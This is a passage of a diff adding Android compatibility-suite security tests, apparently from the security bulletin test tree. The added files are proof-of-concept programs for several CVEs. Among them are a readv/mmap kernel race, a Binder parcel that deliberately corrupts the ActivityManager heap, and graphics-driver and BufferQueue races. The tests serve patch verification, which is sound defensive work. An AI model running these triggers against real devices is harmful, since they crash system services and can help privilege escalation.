+ // int32_t repeatCount
+ outMsg->body.key.repeatCount = msg.body.key.repeatCount;
+ // nsecs_t downTime
+ outMsg->body.key.downTime = msg.body.key.downTime;
+ break;
+ }
+ case InputMessage::TYPE_MOTION: {
+ // uint32_t seq
+ outMsg->body.motion.seq = msg.body.motion.seq;
+ // nsecs_t eventTime
+ outMsg->body.motion.eventTime = msg.body.motion.eventTime;
+ // int32_t deviceId
+ outMsg->body.motion.deviceId = msg.body.motion.deviceId;
+ // int32_t source
+ outMsg->body.motion.source = msg.body.motion.source;
+ // int32_t displayId
+ outMsg->body.motion.displayId = msg.body.motion.displayId;
+ // int32_t action
+ outMsg->body.motion.action = msg.body.motion.action;
+ // int32_t actionButton
+ outMsg->body.motion.actionButton = msg.body.motion.actionButton;
+ // int32_t flags
+ outMsg->body.motion.flags = msg.body.motion.flags;
+ // int32_t metaState
+ outMsg->body.motion.metaState = msg.body.motion.metaState;
+ // int32_t buttonState
+ outMsg->body.motion.buttonState = msg.body.motion.buttonState;
+ // int32_t edgeFlags
+ outMsg->body.motion.edgeFlags = msg.body.motion.edgeFlags;
+ // nsecs_t downTime
+ outMsg->body.motion.downTime = msg.body.motion.downTime;
+ // float xOffset
+ outMsg->body.motion.xOffset = msg.body.motion.xOffset;
+ // float yOffset
+ outMsg->body.motion.yOffset = msg.body.motion.yOffset;
+ // float xPrecision
+ outMsg->body.motion.xPrecision = msg.body.motion.xPrecision;
+ // float yPrecision
+ outMsg->body.motion.yPrecision = msg.body.motion.yPrecision;
+ // uint32_t pointerCount
+ outMsg->body.motion.pointerCount = msg.body.motion.pointerCount;
+ //struct Pointer pointers[MAX_POINTERS]
+ for (size_t i = 0; i < msg.body.motion.pointerCount; i++) {
+ // PointerProperties properties
+ outMsg->body.motion.pointers[i].properties.id =
+ msg.body.motion.pointers[i].properties.id;
+ outMsg->body.motion.pointers[i].properties.toolType =
+ msg.body.motion.pointers[i].properties.toolType;
+ // PointerCoords coords
+ outMsg->body.motion.pointers[i].coords.bits =
+ msg.body.motion.pointers[i].coords.bits;
+ const uint32_t count = BitSet64::count(msg.body.motion.pointers[i].coords.bits);
+ memcpy(&outMsg->body.motion.pointers[i].coords.values[0],
+ &msg.body.motion.pointers[i].coords.values[0],
+ count * sizeof(msg.body.motion.pointers[i].coords.values[0]));
+ }
+ break;
+ }
+ case InputMessage::TYPE_FINISHED: {
+ outMsg->body.finished.seq = msg.body.finished.seq;
+ outMsg->body.finished.handled = msg.body.finished.handled;
+ break;
+ }
+ }
+}
+
+/**
+ * Return false if vulnerability is found for a given message type
+ */
+static bool checkMessage(sp<InputChannel> server, sp<InputChannel> client, int type) {
+ InputMessage serverMsg;
+ // Set all potentially uninitialized bytes to 1, for easier comparison
+
+ memset(&serverMsg, 1, sizeof(serverMsg));
+ serverMsg.header.type = type;
+ if (type == InputMessage::TYPE_MOTION) {
+ serverMsg.body.motion.pointerCount = MAX_POINTERS;
+ }
+ status_t result = server->sendMessage(&serverMsg);
+ if (result != OK) {
+ ALOGE("Could not send message to the input channel");
+ return false;
+ }
+
+ InputMessage clientMsg;
+ result = client->receiveMessage(&clientMsg);
+ if (result != OK) {
+ ALOGE("Could not receive message from the input channel");
+ return false;
+ }
+ if (serverMsg.header.type != clientMsg.header.type) {
+ ALOGE("Types do not match");
+ return false;
+ }
+
+ if (clientMsg.header.padding != 0) {
+ ALOGE("Found padding to be uninitialized");
+ return false;
+ }
+
+ InputMessage sanitizedClientMsg;
+ sanitizeMessage(clientMsg, &sanitizedClientMsg);
+ if (memcmp(&clientMsg, &sanitizedClientMsg, clientMsg.size()) != 0) {
+ ALOGE("Client received un-sanitized message");
+ ALOGE("Received message: %s", memoryAsHexString(&clientMsg, clientMsg.size()).c_str());
+ ALOGE("Expected message: %s",
+ memoryAsHexString(&sanitizedClientMsg, clientMsg.size()).c_str());
+ return false;
+ }
+
+ return true;
+}
+
+/**
+ * Create an unsanitized message
+ * Send
+ * Receive
+ * Compare the received message to a sanitized expected message
+ * Do this for all message types
+ */
+int main() {
+ sp<InputChannel> server, client;
+
+ status_t result = InputChannel::openInputChannelPair(String8("channel name").string(), server, client);
+ if (result != OK) {
+ ALOGE("Could not open input channel pair");
+ return 0;
+ }
+
+ int types[] = {InputMessage::TYPE_KEY, InputMessage::TYPE_MOTION, InputMessage::TYPE_FINISHED};
+ for (int type : types) {
+ bool success = checkMessage(server, client, type);
+ if (!success) {
+ ALOGE("Check message failed for type %i", type);
+ return EXIT_VULNERABLE;
+ }
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/Android.mk
new file mode 100644
index 0000000..dede1c7
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/Android.mk
@@ -0,0 +1,39 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2012-6702
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES += $(TOP)/external/expat/lib/expat.h
+
+LOCAL_SHARED_LIBRARIES := \
+ libc \
+ libexpat \
+ liblog
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/poc.c
new file mode 100644
index 0000000..ab83a0d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/poc.c
@@ -0,0 +1,52 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include "expat.h"
+#include <log/log.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#define MAX_SIZE 20
+
+int main(void) {
+ XML_Parser parser;
+ int i;
+ int randomValues[MAX_SIZE];
+ int isDistinctive = 0;
+
+ for (i = 0; i < MAX_SIZE; i++) {
+ parser = XML_ParserCreate("UTF-8");
+ XML_Parse(parser, "", 0, 1);
+ XML_ParserFree(parser);
+ randomValues[i] = rand();
+ }
+
+ for (i = 1; i < MAX_SIZE; i++) {
+ if (randomValues[0] != randomValues[i]) {
+ isDistinctive |= 1;
+ }
+ }
+
+ if (isDistinctive == 0) {
+ //encountered similar values
+ ALOGE("fail: encountered same random values!");
+ return -1;
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/Android.mk
new file mode 100644
index 0000000..6dd41bd
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/Android.mk
@@ -0,0 +1,30 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2015-1805
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS := -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/poc.c
new file mode 100644
index 0000000..c80b5ed
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/poc.c
@@ -0,0 +1,112 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include "../includes/common.h"
+
+#define BUFS 256
+#define IOV_LEN 16
+#define MAGIC 7
+
+int fd[2];
+struct iovec *iovs = NULL;
+
+void *func_evil(void *data) {
+ munmap((void *)(0x45678000), PAGE_SIZE);
+ mmap((void *)(0x45678000), PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
+ return data;
+}
+
+void *func_readv(void *data) {
+ readv(fd[0], iovs, BUFS);
+ return data;
+}
+
+int main() {
+ int ret = -1, i;
+ void *bufs[BUFS];
+ time_t test_started = start_timer();
+ pthread_t thr_evil, thr_readv;
+
+ if (pipe(fd) < 0) {
+ goto __out;
+ }
+ fcntl(fd[0], F_SETFL, O_NONBLOCK);
+ fcntl(fd[1], F_SETFL, O_NONBLOCK);
+
+ iovs = (struct iovec *)malloc(sizeof(bufs) / sizeof(bufs[0]) *
+ sizeof(struct iovec));
+ if (iovs == NULL) {
+ goto __close_pipe;
+ }
+
+ bufs[MAGIC] = mmap((void *)(0x45678000), PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
+ if (bufs[MAGIC] == MAP_FAILED) {
+ goto __close_pipe;
+ }
+
+ for (size_t i = 0; i < sizeof(bufs) / sizeof(bufs[0]); i++) {
+ if (i == MAGIC) continue;
+ bufs[i] = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ if (bufs[i] == MAP_FAILED) {
+ goto __free_bufs;
+ }
+
+ iovs[i].iov_base = bufs[i];
+ iovs[i].iov_len = IOV_LEN;
+ }
+
+ iovs[MAGIC - 1].iov_len = IOV_LEN * 10;
+ iovs[MAGIC].iov_base = bufs[MAGIC];
+ iovs[MAGIC].iov_len = IOV_LEN;
+
+ i = 0;
+
+ while (timer_active(test_started)) {
+ write(fd[1], bufs[0], PAGE_SIZE);
+
+ pthread_create(&thr_evil, NULL, func_evil, NULL);
+ pthread_create(&thr_readv, NULL, func_readv, NULL);
+
+ pthread_join(thr_evil, NULL);
+ pthread_join(thr_readv, NULL);
+ }
+
+__free_bufs:
+ for (size_t i = 0; i < sizeof(bufs) / sizeof(bufs[0]); i++) {
+ if (bufs[i]) munmap(bufs[i], PAGE_SIZE);
+ }
+
+__close_pipe:
+ close(fd[0]);
+ close(fd[1]);
+
+__out:
+ return ret;
+
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk
new file mode 100644
index 0000000..77de47e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-2412
+LOCAL_SRC_FILES := poc.cpp
+
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_SHARED_LIBRARIES := libbinder \
+ libutils
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp
new file mode 100644
index 0000000..7e3b067
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp
@@ -0,0 +1,99 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+using namespace android;
+typedef enum TRANTYPE { HEAPSPRAY, HEAPCORRUPT, HEAPFENGSHUI } TRANTYPE;
+
+static void writeParcelableHead(Parcel *pData, const char *class_name) {
+ // write key
+ static int count = 1;
+ const int VAL_PARCELABLE = 4;
+ char buffer[16] = {0};
+ snprintf(buffer, 16, "%d", count);
+
+ pData->writeString16(String16((const char *)buffer));
+ pData->writeInt32(VAL_PARCELABLE);
+ pData->writeString16(String16(class_name));
+}
+
+void writeRegion(Parcel *pData) {
+ pData->writeInt32(100); // length of region;
+ pData->writeInt32(
+ 0x3fffffff); // runCount, the allocted size will be 0x3fffffff*4+16=0xc
+ pData->writeInt32(0xf); // fBounds
+ pData->writeInt32(0xf); // YSpanCount
+ pData->writeInt32(0xf); // IntervalCount
+
+ char buffer[100];
+ memset(buffer, 0xcc,
+ sizeof(buffer)); // this buffer will be used to corrrupt the heap
+ pData->write(buffer, sizeof(buffer));
+}
+
+static void writeBundle(Parcel *pData, int type) {
+ size_t lengthPos = pData->dataPosition();
+ pData->writeInt32(0xfffff);
+ const int BUNDLE_MAGIC = 0x4C444E42;
+ pData->writeInt32(BUNDLE_MAGIC);
+ size_t startPos = pData->dataPosition();
+
+ if (type == HEAPCORRUPT) {
+ pData->writeInt32(1); // from writeArrayMapInternal,object numbers in bundle
+ writeParcelableHead(pData, "android.graphics.Region");
+ writeRegion(pData);
+ } else { // other than HEAPCORRUPT
+ exit(0);
+ }
+
+ size_t endPos = pData->dataPosition();
+ // Backpatch length
+ pData->setDataPosition(lengthPos);
+ int length = endPos - startPos;
+ pData->writeInt32(length);
+ pData->setDataPosition(endPos);
+}
+
+static void transact(sp<IBinder> &service, TRANTYPE type) {
+ const int CONVERT_TO_TRANSLUCENT_TRANSACTION = 175;
+ Parcel data, reply;
+
+ data.writeInterfaceToken(String16("android.app.IActivityManager"));
+ data.writeStrongBinder(service);
+ data.writeInt32(333);
+ writeBundle(&data, type);
+ service->transact(CONVERT_TO_TRANSLUCENT_TRANSACTION, data, &reply);
+}
+
+int main(__attribute__((unused)) int argc,
+ __attribute__((unused)) char *const argv[]) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> service = sm->checkService(String16("activity"));
+ if (service != NULL) {
+ printf("heap corruption\n");
+ transact(service, HEAPCORRUPT);
+ } else {
+ printf("get activitymanger failed\n");
+ }
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
index 94202f6..5d4950a 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
@@ -26,6 +26,7 @@
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
+#include "../includes/common.h"
#define THREAD_NUM 600
#define DEV "/dev/kgsl-3d0"
@@ -124,39 +125,46 @@
void* child_ioctl_0(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_destroy kdd = {0};
kdd.drawctxt_id = kgsl_id;
set_affinity(1);
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &kdd);
}
+ return NULL;
}
void* child_ioctl_1(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_destroy kdd = {0};
kdd.drawctxt_id = kgsl_id;
set_affinity(2);
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &kdd);
}
+ return NULL;
}
void* child_ioctl_2(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_create kdc = {0, 0};
kdc.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
set_affinity(3);
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &kdc);
kgsl_id = kdc.drawctxt_id;
}
+ return NULL;
}
int main() {
int i, ret;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_create kdc = {0, 0};
kdc.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
struct kgsl_drawctxt_destroy kdd = {0};
@@ -179,8 +187,12 @@
pthread_create(thread_id + i + 2, NULL, child_ioctl_2, NULL);
}
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &kdc);
kgsl_id = kdc.drawctxt_id;
}
+
+ close(fd);
+
+ return 0;
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk
new file mode 100644
index 0000000..e3884e6
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk
@@ -0,0 +1,40 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0415
+LOCAL_SRC_FILES := poc.cpp
+
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_SHARED_LIBRARIES := libutils \
+ libui \
+ libgui \
+ libmedia
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/frameworks/native/include/media/openmax
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/poc.cpp
new file mode 100644
index 0000000..37e3ca7
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/poc.cpp
@@ -0,0 +1,74 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <gui/BufferQueue.h>
+#include <gui/IGraphicBufferProducer.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <ui/Fence.h>
+#include <utils/String8.h>
+
+using namespace android;
+
+#define MAX_TRY 5000 // based on experiments
+volatile int quit = 1;
+
+static void *start2(void *args) {
+ sp<IGraphicBufferProducer> bufferProducer =
+ *(sp<IGraphicBufferProducer> *)args;
+
+ /*
+ * It will end when ever the main thread exits due to
+ * two conditions.
+ * 1. count value reaches less than 0
+ * 2. Transact failed
+ */
+ while (quit) {
+ int buffer;
+ sp<Fence> fence;
+ bufferProducer->dequeueBuffer(&buffer, &fence, 800, 600, 1, 0, nullptr,
+ nullptr);
+ }
+ return NULL;
+}
+
+int main(__attribute__((unused)) int argc,
+ __attribute__((unused)) char *const argv[]) {
+ int count = MAX_TRY;
+ int result = EXIT_SUCCESS;
+ sp<IGraphicBufferProducer> bufferProducer = NULL;
+ sp<IGraphicBufferConsumer> bufferConsumer = NULL;
+
+ pthread_t thread;
+ pthread_create(&thread, NULL, start2, &bufferProducer);
+
+ while (quit) {
+ bufferConsumer->setConsumerName(String8("dddddddddddddddd"));
+ String8 str = bufferProducer->getConsumerName();
+ if (count < 0) {
+ quit = 0;
+ }
+ if (!strcmp("TransactFailed", str.string())) {
+ result = EXIT_FAILURE;
+ quit = 0;
+ }
+ count--;
+ }
+ pthread_join(thread, NULL);
+
+ return result;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/Android.mk
new file mode 100644
index 0000000..498e85f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/Android.mk
@@ -0,0 +1,32 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0477
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS = -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
+
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/poc.c
new file mode 100644
index 0000000..5a7baa7
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/poc.c
@@ -0,0 +1,63 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <dlfcn.h>
+#include <string.h>
+#include <sys/mman.h>
+
+typedef struct {
+ uint32_t width;
+ uint32_t height;
+ uint32_t format;
+ const unsigned char* pixels;
+} gdx2d_pixmap;
+
+gdx2d_pixmap *(*gdx2d_load)(const unsigned char *buffer, uint32_t len);
+void (*gdx2d_free)(const gdx2d_pixmap* pixmap);
+
+int main() {
+ void *libgdx = dlopen("libgdx.so", RTLD_LAZY);
+ if(libgdx == NULL) {
+ return -1;
+ }
+ gdx2d_load = dlsym(libgdx, "gdx2d_load");
+ gdx2d_free = dlsym(libgdx, "gdx2d_free");
+ if(gdx2d_load == NULL || gdx2d_free == NULL){
+ dlclose(libgdx);
+ return -2;
+ }
+
+ char *fname = "/data/local/tmp/CVE-2017-0477.gif";
+ int fd = open(fname, O_RDONLY);
+ struct stat st;
+ fstat(fd, &st);
+ void *ptr = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
+
+ gdx2d_pixmap *pixmap = gdx2d_load((unsigned char *) ptr, st.st_size);
+ if (pixmap) {
+ gdx2d_free(pixmap);
+ }
+ dlclose(libgdx);
+ return 0;
+}
+
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13273/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13273/Android.mk
new file mode 100644
index 0000000..1cb7357
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13273/Android.mk
@@ -0,0 +1,31 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-13273
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13273/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13273/poc.c
new file mode 100644
index 0000000..0856392
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13273/poc.c
@@ -0,0 +1,136 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
